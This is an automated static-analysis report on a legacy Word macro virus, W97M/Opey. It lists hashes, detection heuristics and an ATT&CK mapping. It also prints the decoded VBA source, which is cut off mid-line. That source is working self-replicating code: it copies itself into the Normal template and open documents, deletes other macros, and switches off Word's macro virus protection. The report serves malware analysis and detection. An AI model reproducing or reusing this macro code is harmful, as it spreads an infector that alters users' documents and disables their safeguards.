W97M/Opey — Office (OLE) malware analysis

Static analysis result for SHA-256 d2bca65dbdcc0aaf…

MALICIOUS

Office (OLE)

Size: 70.0 KB
Created: 2000-11-09 11:09:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b31561da340513dfe8737beeeaccb551
SHA-1: 2ad83810669bb8e729d1d7c791de7750aae3c401
SHA-256: d2bca65dbdcc0aaf9d299c439c15408551fb73ef6363d37c6fdf7fafaa8c5c7e
Risk Score: 220

Malware Insights

W97M/Opey · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, including an AutoOpen macro, which are commonly used to execute malicious code. The embedded script attempts to copy itself to other documents and potentially the Normal template, indicating an effort to spread and persist. ClamAV detections further confirm its malicious nature, identifying it as Doc.Trojan.Opey-18.

Heuristics (4)

  • ClamAV: Doc.Trojan.Opey-18 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    Document contains an AutoOpen macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24038 bytes
SHA-256: aac2a859c8fb4262a21be119106cec565bcac60ca97fcea601e6ce467cfad1e1
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Crazy_Man_06"
Sub AkoLang()
  On Error Resume Next
  System.Cursor = wdCursorNormal
      Call Crazy_01
    NTInfected = False
        For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
            clan = NormalTemplate.VBProject.VBComponents(i).Name
                If (clan = "MyForm1") And (clan = "Crazy_Man_06") Then NTInfected = True
                If (clan <> "MyForm1") And (clan <> "Crazy_Man_06") And (clan <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
        Next i
        For Each opendoc In Documents
            ODInfected = False
            With opendoc
             For j = opendoc.VBProject.VBComponents.Count To 1 Step -1
                clan = opendoc.VBProject.VBComponents(j).Name
                    If (clan = "MyForm1") And (clan = "Crazy_Man_06") Then ODInfected = True
                    If (clan <> "MyForm1") And (clan <> "Crazy_Man_06") And (clan <> "ThisDocument") And (clan <> "Reference to Normal") Then
                    Application.OrganizerDelete Source:=opendoc.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
                     End If
                 Next j
                If ODInfected = False Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="Crazy_Man_06", Object:=wdOrganizerObjectProjectItems
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="MyForm1", Object:=wdOrganizerObjectProjectItems
                    If (Mid(opendoc.FullName, 2, 1) = ":") Then
                      filesSize = FileLen(opendoc.Name)
                       If (System.FreeDiskSpace <= filesSize) Then
                          MsgBox prompt:="Cant' Save " & opendoc.Name & " in Drive " & Mid(opendoc.FullName, 1, 1) & ":\ Disk is full, Please Insert Another Disk and Click Ok.."
                          If (System.FreeDiskSpace <= filesSize) Then
                            MsgBox prompt:="Disk Full Try to save to another drive.."
                             Dialogs(wdDialogFileSaveAs).Show
                              
                          End If
                          Else
                          opendoc.SaveAs FileName:=opendoc.FullName
                       End If
                      End If
                    
                    End If
            End With
        Next opendoc
            If NTInfected = False Then
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Crazy_Man_06", Object:=wdOrganizerObjectProjectItems
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="MyForm1", Object:=wdOrganizerObjectProjectItems
                NormalTemplate.Save
            End If
         
End Sub
Sub Crazy_01()
    On Error Resume Next
System.Cursor = wdCursorNormal
    If (Month(Now) > 7) Then
    Application.UserName = "Crazy Man"
    Application.UserAddress = "LBTMM B'99 PHILIPPINES"
    Application.UserInitials = "Crazy"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Crazy Man"
        .Title = "Crazy"
        .Manager = "MMA"
        .Company = "Crazy Man Company"
        .Comments = "HELLO I am the Crazy Man From the Crazy World of Computer. Don't you worry I'm not as crazy than you think..."
        .Execute
    End With
    End If
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    Comma
... (truncated)